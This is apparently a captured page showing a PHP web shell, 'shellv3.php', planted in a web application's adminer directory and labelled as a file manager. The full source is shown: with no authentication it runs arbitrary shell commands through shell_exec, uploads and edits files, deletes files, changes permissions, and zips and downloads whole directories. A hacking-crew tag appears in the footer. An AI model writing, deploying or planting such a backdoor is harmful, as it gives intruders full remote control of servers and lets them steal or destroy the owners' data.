PHP WebShell
Текущая директория: /var/www/bitcardoApp/adminer
Просмотр файла: shellv3.php
<?php
session_start();
error_reporting(0);
$root = '/';
$path = isset($_POST['path']) ? realpath($_POST['path']) : getcwd();
if (!is_dir($path)) $path = getcwd();
chdir($path);
function human_filesize($size) {
$units = ['B','KB','MB','GB','TB'];
for ($i = 0; $size >= 1024 && $i < count($units)-1; $i++) $size /= 1024;
return round($size,2).' '.$units[$i];
}
function list_dir($dir) {
$items = array_diff(scandir($dir), ['.']);
$dirs = $files = [];
foreach ($items as $item) {
if ($item === '..' && realpath($dir) === '/') continue;
$full = "$dir/$item";
is_dir($full) ? $dirs[] = $item : $files[] = $item;
}
return array_merge($dirs, $files);
}
function breadcrumbs($path) {
$parts = explode('/', trim($path, '/'));
$breadcrumb = '<form method="POST" style="display:inline">';
$accum = '';
$breadcrumb .= '<button name="path" value="/">/root</button>';
foreach ($parts as $p) {
if (!$p) continue;
$accum .= "/$p";
$breadcrumb .= ' / <button name="path" value="'.htmlspecialchars($accum).'">'.htmlspecialchars($p).'</button>';
}
return $breadcrumb.'</form>';
}
function icons($file) {
return is_dir($file) ? '📁' : '📄';
}
if (isset($_POST['delete'])) {
$target = $_POST['delete'];
is_dir($target) ? rmdir($target) : unlink($target);
}
if (isset($_POST['rename']) && isset($_POST['newname'])) {
rename($_POST['rename'], dirname($_POST['rename']).'/'.$_POST['newname']);
}
if (isset($_POST['edit']) && isset($_POST['content'])) {
file_put_contents($_POST['edit'], $_POST['content']);
}
if (isset($_FILES['upload'])) {
move_uploaded_file($_FILES['upload']['tmp_name'], $path.'/'.$_FILES['upload']['name']);
}
if (isset($_POST['unzip'])) {
$zip = new ZipArchive;
if ($zip->open($_POST['unzip']) === TRUE) {
$zip->extractTo($path);
$zip->close();
}
}
if (isset($_POST['cmd'])) {
$cmd = shell_exec($_POST['cmd'].' 2>&1');
}
if (isset($_POST['chmod']) && isset($_POST['perm'])) {
chmod($_POST['chmod'], octdec($_POST['perm']));
}
if (isset($_POST['newfolder']) && !empty($_POST['foldername'])) {
mkdir($path.'/'.trim($_POST['foldername']));
}
if (isset($_POST['newfile']) && !empty($_POST['filename'])) {
file_put_contents($path.'/'.trim($_POST['filename']), '');
}
if (isset($_POST['downloadzip'])) {
$zipname = $path.'/'.basename($path).".zip";
$zip = new ZipArchive;
$zip->open($zipname, ZipArchive::CREATE | ZipArchive::OVERWRITE);
$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($path), RecursiveIteratorIterator::LEAVES_ONLY);
foreach ($files as $name => $file) {
if (!$file->isDir()) {
$filePath = $file->getRealPath();
$relativePath = substr($filePath, strlen($path) + 1);
$zip->addFile($filePath, $relativePath);
}
}
$zip->close();
header('Content-Type: application/zip');
header('Content-disposition: attachment; filename='.basename($zipname));
readfile($zipname);
unlink($zipname);
exit;
}
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>File Manager</title>
<style>
body { font-family: monospace; background: #1e1e1e; color: #eee; margin:0; padding:1em; }
form { display:inline; }
button, input, select, textarea { background:#222; color:#eee; border:1px solid #444; padding:2px 5px; margin:2px; border-radius:4px; }
a { color: #6cf; text-decoration:none; }
a:hover { text-decoration:underline; }
table { width:100%; border-collapse: collapse; margin-top: 1em;}
th, td { padding: 6px; text-align: left; border-bottom: 1px solid #333; }
th { background:#111; }
tr:hover { background:#292929; }
textarea { width:100%; height:400px; }
.rename-form, .chmod-form { display: none; margin-top: 5px; }
.flex { display: flex; flex-wrap: wrap; gap: 1em; margin-top: 1em; align-items: flex-start; }
.block { flex: 1 1 300px; }
</style>
<script>
function toggleRename(id) {
var el = document.getElementById('rename-'+id);
el.style.display = el.style.display === 'inline' ? 'none' : 'inline';
}
function toggleChmod(id) {
var el = document.getElementById('chmod-'+id);
el.style.display = el.style.display === 'inline' ? 'none' : 'inline';
}
</script>
</head>
<body>
<big>
🖥️ <?= php_uname() ?> | PHP <?= phpversion() ?> | Disk: <?= human_filesize(disk_free_space($path)) ?> free of <?= human_filesize(disk_total_space($path)) ?>
</big>
<div class="flex">
<div class="block">
<form method="POST">
<input type="text" name="cmd" style="width:100%" placeholder="Command">
<button>Run</button>
</form>
<?php if (isset($cmd)): ?>
<pre><?= htmlspecialchars($cmd) ?></pre>
<?php endif; ?>
</div>
<div class="block">
<form method="POST" enctype="multipart/form-data">
<input type="file" name="upload"><br>
<button>Upload</button>
</form>
</div>
</div>
<div>📌 Path: <?= breadcrumbs($path) ?></div>
<table>
<tr><th>Icon</th><th>Name</th><th>Size</th><th>Modified</th><th>Actions</th></tr>
<?php foreach (list_dir($path) as $i => $item):
$full = $path.'/'.$item;
$id = md5($full);
?>
<tr>
<td><?= icons($full) ?></td>
<td>
<?php if (is_dir($full)): ?>
<form method="POST">
<input type="hidden" name="path" value="<?= htmlspecialchars($full) ?>">
<button><?= htmlspecialchars($item) ?></button>
</form>
<?php else: ?>
<?= htmlspecialchars($item) ?>
<?php endif; ?>
</td>
<td><?= is_file($full) ? human_filesize(filesize($full)) : '-' ?></td>
<td><?= date('Y-m-d H:i:s', filemtime($full)) ?></td>
<td>
<?php if (!is_dir($full)): ?>
<form method="POST" style="display:inline"><button name="editfile" value="<?= $full ?>">✏️</button></form>
<form method="POST" style="display:inline"><button name="download" value="<?= $full ?>">⬇️</button></form>
<?php endif; ?>
<form method="POST" style="display:inline"><button name="delete" value="<?= $full ?>" onclick="return confirm('Delete?')">❌</button></form>
<button onclick="toggleRename('<?= $id ?>')">📝</button>
<span id="rename-<?= $id ?>" class="rename-form">
<form method="POST" style="display:inline">
<input type="hidden" name="rename" value="<?= $full ?>">
<input name="newname" placeholder="new name">
<button>OK</button>
</form>
</span>
<button onclick="toggleChmod('<?= $id ?>')">⚙️</button>
<span id="chmod-<?= $id ?>" class="chmod-form">
<form method="POST" style="display:inline">
<input type="hidden" name="chmod" value="<?= $full ?>">
<input name="perm" placeholder="0755" size="5">
<button>Set</button>
</form>
</span>
<?php if (is_file($full) && preg_match('/\.zip$/i', $item)): ?>
<form method="POST" style="display:inline">
<input type="hidden" name="unzip" value="<?= $full ?>">
<button>📦 Unzip</button>
</form>
<?php endif; ?>
</td>
</tr>
<?php endforeach; ?>
</table>
<div class="flex">
<div class="block">
<form method="POST">
<input type="text" name="foldername" placeholder="New Folder Name">
<button name="newfolder">📁 Create Folder</button>
</form>
</div>
<div class="block">
<form method="POST">
<input type="text" name="filename" placeholder="New File Name">
<button name="newfile">📄 Create File</button>
</form>
</div>
<div class="block">
<form method="POST">
<button name="downloadzip">📦 Download Folder (.zip)</button>
</form>
</div>
</div>
<?php if (isset($_POST['editfile'])): $file = $_POST['editfile']; ?>
<h3>📝 Edit File: <?= htmlspecialchars($file) ?></h3>
<form method="POST">
<input type="hidden" name="edit" value="<?= htmlspecialchars($file) ?>">
<textarea name="content" id="editor"><?= htmlspecialchars(file_get_contents($file)) ?></textarea><br>
<button>Save</button>
</form>
<script src="https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.65.15/codemirror.min.js"></script>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.65.15/codemirror.min.css">
<script src="https://cdnjs.cloudflare.com/ajax/libs/codemirror/5.65.15/mode/php/php.min.js"></script>
<script>
var editor = CodeMirror.fromTextArea(document.getElementById("editor"), {
lineNumbers: true,
mode: "application/x-httpd-php",
theme: "default"
});
</script>
<?php endif; ?>
<hr>
<center><small style="opacity:0.6">🚀 Squad Tua Never Die 🚀</small></center>
</body>
</html>
Выполнить команду
Для локальной разработки. Не используйте в интернете!